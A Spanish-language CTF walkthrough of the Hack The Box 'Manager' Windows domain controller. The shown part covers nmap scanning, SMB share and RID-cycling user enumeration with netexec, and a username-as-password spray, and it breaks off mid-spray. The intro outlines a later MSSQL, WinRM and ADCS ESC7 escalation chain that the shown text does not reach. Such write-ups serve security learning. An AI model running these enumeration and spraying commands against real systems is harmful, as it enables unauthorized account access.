Manager

Publicado 06/10/2024 Actualizado 13/11/2024

Por Justice-Reaper

42 min de lectura

Manager

Skills

SMB Enumeration
User Enumeration - RID Cycling Attack (Netexec)
Ldap Enumeration (ldapdomaindump)
Credentials Brute Force (CrackMapExec)
MSSQL Enumeration (mssqlclient.py)
Abusing MSSQL (xp_dirtree)
Information Leakage
Abusing WinRM to get an interactive console
DC Enumeration (adPEAS) - Powershell tool to automate Active Directory enumeration
Abusing Advice Directory Certificate Services (ADCS)
ESC7 exploitation case with certipy [Privilege Escalation

Certificaciones

OSCP
OSEP
eCPPTv3

Descripción

Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation

Reconocimiento

Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad

# ping 10.129.160.212
PING 10.129.160.212 (10.129.160.212) 56(84) bytes of data.
64 bytes from 10.129.160.212: icmp_seq=1 ttl=127 time=36.1 ms
64 bytes from 10.129.160.212: icmp_seq=2 ttl=127 time=36.3 ms
64 bytes from 10.129.160.212: icmp_seq=3 ttl=127 time=36.3 ms
^C
--- 10.129.160.212 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 36.098/36.241/36.324/0.101 ms

Nmap

Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.160.212 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning 10.129.160.212 [65535 ports]
Discovered open port 139/tcp on 10.129.160.212
Discovered open port 80/tcp on 10.129.160.212
Discovered open port 445/tcp on 10.129.160.212
Discovered open port 135/tcp on 10.129.160.212
Discovered open port 53/tcp on 10.129.160.212
Discovered open port 49687/tcp on 10.129.160.212
Discovered open port 49720/tcp on 10.129.160.212
Discovered open port 3268/tcp on 10.129.160.212
Discovered open port 3269/tcp on 10.129.160.212
Discovered open port 49730/tcp on 10.129.160.212
Discovered open port 49686/tcp on 10.129.160.212
Discovered open port 464/tcp on 10.129.160.212
Discovered open port 49685/tcp on 10.129.160.212
Discovered open port 636/tcp on 10.129.160.212
Discovered open port 49763/tcp on 10.129.160.212
Discovered open port 593/tcp on 10.129.160.212
Discovered open port 1433/tcp on 10.129.160.212
Discovered open port 49667/tcp on 10.129.160.212
Discovered open port 5985/tcp on 10.129.160.212
Discovered open port 9389/tcp on 10.129.160.212
Discovered open port 389/tcp on 10.129.160.212
Discovered open port 88/tcp on 10.129.160.212
Completed SYN Stealth Scan at 19:28, 39.63s elapsed (65535 total ports)
Nmap scan report for 10.129.160.212
Host is up (0.051s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49685/tcp open  unknown
49686/tcp open  unknown
49687/tcp open  unknown
49720/tcp open  unknown
49730/tcp open  unknown
49763/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.69 seconds
           Raw packets sent: 196581 (8.650MB) | Rcvd: 42 (1.848KB)

Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados

# nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49685,49686,49687,49720,49730,49763 10.129.160.212 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:29 CEST
Nmap scan report for 10.129.160.212
Host is up (0.086s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-13 00:29:26Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ms-sql-info: 
|   10.129.160.212:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.160.212:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-13T00:26:26
|_Not valid after:  2054-09-13T00:26:26
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-13T00:30:56+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2024-09-13T00:30:57+00:00; +7h00m00s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49685/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open     msrpc         Microsoft Windows RPC
49687/tcp open     msrpc         Microsoft Windows RPC
49720/tcp open     msrpc         Microsoft Windows RPC
49730/tcp filtered unknown
49763/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-09-13T00:30:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.42 seconds

SMB Enumeration

Obtenemos el nombre de la máquina y el dominio

# netexec smb 10.129.160.212                           
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)

Añadimos el dominio al /etc/hosts

127.0.0.1   localhost
127.0.1.1   kali-linux
10.129.160.212  dc01 dc01.manager.htb manager.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Enumeramos recursos compartidos por SMB, he intentado conectarme con smbclient pero no me deja ejecutar comandos

# netexec smb 10.129.160.212 -u 'guest' -p '' --shares 
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [+] manager.htb\guest: 
SMB         10.129.160.212  445    DC01             [*] Enumerated shares
SMB         10.129.160.212  445    DC01             Share           Permissions     Remark
SMB         10.129.160.212  445    DC01             -----           -----------     ------
SMB         10.129.160.212  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.160.212  445    DC01             C$                              Default share
SMB         10.129.160.212  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.160.212  445    DC01             NETLOGON                        Logon server share 
SMB         10.129.160.212  445    DC01             SYSVOL                          Logon server share 

Enumeramos usuarios bruteforceando el RID

# netexec smb 10.129.160.212 -u 'guest' -p '' --rid-brute        
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [+] manager.htb\guest: 
SMB         10.129.160.212  445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.129.160.212  445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.129.160.212  445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.129.160.212  445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.129.160.212  445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.129.160.212  445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.129.160.212  445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.160.212  445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.160.212  445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.129.160.212  445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.160.212  445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.160.212  445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.160.212  445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.129.160.212  445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.160.212  445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.129.160.212  445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.129.160.212  445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.129.160.212  445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.129.160.212  445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.129.160.212  445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.129.160.212  445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.129.160.212  445    DC01             1119: MANAGER\Operator (SidTypeUser)

Nos creamos un diccionario con estos usuarios, es importante que también existan los nombres con la primera letra en minúscula y todo el nombre en mayúsculas. El nombre de usuario es case insensitive, sin embargo, la contraseña no lo es, por lo que debemos tener todas las combinaciones posibles. He usado esta web para convertir las letras a sus diferentes formas https://mayusculasminusculas.com/

Zhong   
Cheng   
Ryan    
Raven   
JinWoo  
ChinHae
Operator
zhong   
cheng   
ryan    
raven   
jinWoo  
chinHae
operator
ZHONG   
CHENG   
RYAN    
RAVEN   
JINWOO  
CHINHAE
OPERATOR

Bruteforceamos credenciales válidas y encontramos operator:operator

# netexec smb 10.129.160.212 -u users -p users                      
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Zhong STATUS_LOGON_FAILURE 
^CSMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Zhong STATUS_LOGON_FAILURE 
^C^C
                                                                                                                                                                                       

   ~/Desktop/Manager/content  6s ❯ 

   ~/Desktop/Manager/content ❯ netexec smb 10.129.160.212 -u users -p users --continue-on-succes 
SMB         10.129.160.212  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:JinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Operator STATUS_LOGON_FAILURE 
